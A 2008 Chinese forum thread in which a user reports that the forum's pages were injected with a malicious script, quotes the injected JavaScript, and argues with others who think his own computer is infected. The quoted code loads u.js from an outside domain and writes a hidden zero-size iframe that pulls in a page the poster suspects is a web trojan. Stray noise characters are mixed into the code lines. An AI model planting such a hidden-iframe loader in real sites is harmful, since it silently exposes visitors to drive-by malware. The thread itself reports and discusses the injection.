此网被挂马

czy12 · 发表于 2008-11-26 14:38:57

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

您需要登录才可以下载或查看，没有帐号？注册

x

马:Hack.Exploit.Script.JS.Mixed.c

<script language="javascript" SRC=" ' target=_blank>http://u.cruze3.cn/u.js"></script>
( Q7 Z' z9 m a: r8 q, b
0 ]- }- q$ Y J
document.writeln("<script>";+ f. V7 U% j% ^ G' e7 D! f- s
document.writeln("function oK_Begin(){";, b, _( C4 [6 c6 v; Y8 q/ f" A
document.writeln("var Then = new Date() ";
! ~6 S" o; l4 D9 k8 c
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";+ b. a M9 F y* ^7 E, U3 a: Z8 T6 i
document.writeln("var cookieString = new String(document.cookie)";
. V0 i" _$ L! |8 `9 g- [& b
document.writeln("var cookieHeader = "Cookie1=" ";+ o! g' V& {( M! R
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
1 \$ y: L$ T0 x5 V+ C+ m. x8 Z
document.writeln("if (beginPosition != -1){ ";& p5 k, E, _% ~4 x: s' ~0 B6 d
document.writeln("} else "; Q) F2 I7 c) d) V- T# ~/ [
document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";6 V5 j5 d6 t) Z" H2 o0 M2 C* l
document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
/ K- h& T" M1 E" a1 ], @$ z
document.writeln("}";
# q0 X4 a5 u( _$ k3 C6 E+ h
document.writeln("}";7 D2 a8 x8 h" l
document.writeln("oK_Begin();";
$ V0 ?1 \+ \& w8 o% q: y ]
document.writeln("<\/script>";
- u, r }% t! A' M0 u& ^
document.writeln("<script>window.onerror=function(){return true;}<\/script>"
N" y1 x2 @( ~% g8 Y8 M# y. m
3 W" y# o- |1 x( @1 [
: [1 X( {: e% F0 u9 P* G; P' g8 U
- [ m+ H1 E7 k9 J/ C( D
W/ I+ S5 S/ V% O d' y |
9 X9 R3 U! G, N2 g

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205 · 发表于 2008-11-26 14:44:03

请管理员确认是否网页挂马?

cayuer · 发表于 2008-11-26 14:47:52

我的麦咖啡都没检测出来你什么杀毒软件？

czy12 · 发表于 2008-11-26 16:16:23

不是杀软件查的.
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
不过,已经被清理了.

HEHE只是没有礼貌

[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪 · 发表于 2008-11-26 18:27:17

你这个什么网站，哪里出来的？

ht tp://u.cruze3.cn/u.js

czy12 · 发表于 2008-11-27 09:15:28

http://u.cruze3.cn/u.js
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
HEHE

wwqq · 发表于 2008-11-27 10:26:38

这跟三维有什么关系？

czy12 · 发表于 2008-11-27 11:01:02

这是挂在三维网论坛里的.
红线所指

huang_baker · 发表于 2008-11-27 11:21:19

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪 · 发表于 2008-11-27 11:26:10

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12 · 发表于 2008-11-27 11:34:27

不学无术.
HEHE

yyywwwhk · 发表于 2008-11-27 14:30:45

但在:
http://www.3dportal.cn/discuz/ 之原始檔
似乎看不见楼主所说的 http://u.cruze3.cn/u.js

[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子 · 发表于 2008-11-27 15:30:58

经过自编扫描代码处理结果，未发现楼主说的挂马代码！

请清理自己计算机的缓冲区！

hebei · 发表于 2008-11-27 15:43:48

提示: 作者被禁止或删除内容自动屏蔽

college · 发表于 2008-11-27 15:47:42

看您的尾符/script，很像是U盘病毒。

czy12 · 发表于 2008-11-27 15:50:50

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
我也说了：已修复。

ps:这与缓存毫无关系。虽然缓存中有U.JS.
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?

script是个JAVA代码,与U盘何关?

HEHE

[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子 · 发表于 2008-11-27 16:11:40

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！

如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。

相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！

		自动登录	找回密码
密码			注册

通知

此网被挂马

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

回复 3# cayuer 的帖子

回复 5# 江南有雪的帖子

回复 6# czy12 的帖子

回复 8# czy12 的帖子

hebei hebei 当前离线积分 2978 UID 494886 主题在线时间小时注册时间 2008-3-22 头像被屏蔽	发表于 2008-11-27 15:43:48 \| 显示全部楼层来自：中国河北衡水提示: 作者被禁止或删除内容自动屏蔽

	回复支持反对举报

通知

此网被挂马

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

回复 3# cayuer 的帖子

回复 5# 江南有雪 的帖子

回复 6# czy12 的帖子

回复 8# czy12 的帖子

回复 5# 江南有雪的帖子